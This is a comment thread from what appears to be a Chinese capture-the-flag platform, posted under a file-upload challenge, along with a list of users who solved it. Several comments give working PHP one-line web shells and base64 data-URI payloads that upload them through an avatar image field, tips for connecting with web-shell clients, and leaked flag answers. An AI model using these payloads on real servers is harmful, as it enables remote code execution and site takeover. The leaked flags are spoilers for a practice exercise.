评分(8)
解题动态
lilac 攻破了该题 18小时前
hyes 攻破了该题 1天前
yitiaoxanyu123 攻破了该题 1天前
xiuliyeer1 攻破了该题 2天前
星落 攻破了该题 3天前
cbojue 攻破了该题 6天前
Yb9msxx 攻破了该题 6天前
19174684581 攻破了该题 7天前
jm2166 攻破了该题 11天前
coolsword2023 攻破了该题 12天前
18993762527 攻破了该题 13天前
yijueo 攻破了该题 16天前
donbrothers 攻破了该题 19天前
tommyxy 攻破了该题 22天前
15181405972 攻破了该题 22天前
15346899030 攻破了该题 22天前
gl 攻破了该题 24天前
Bojing 攻破了该题 26天前
LMSY 攻破了该题 26天前
评论
BlueL1ght 2月前
举报
<?php echo `$_POST[a]`;?>
Daniel2023 3月前
举报
<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=
vchopin 5月前
举报
base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上
XRain 7月前
举报
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。
不会编程的崽 8月前
举报
我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。
三碗不过杠 8月前
举报
flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base
冯飞99 11月前
举报
这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}
wxy1343 11月前
举报
flag{412d5e0844a33f36c9aa3d688425fb9f}
ctfliu 1年前
举报
image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag
五无心惘然 1年前
举报
别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了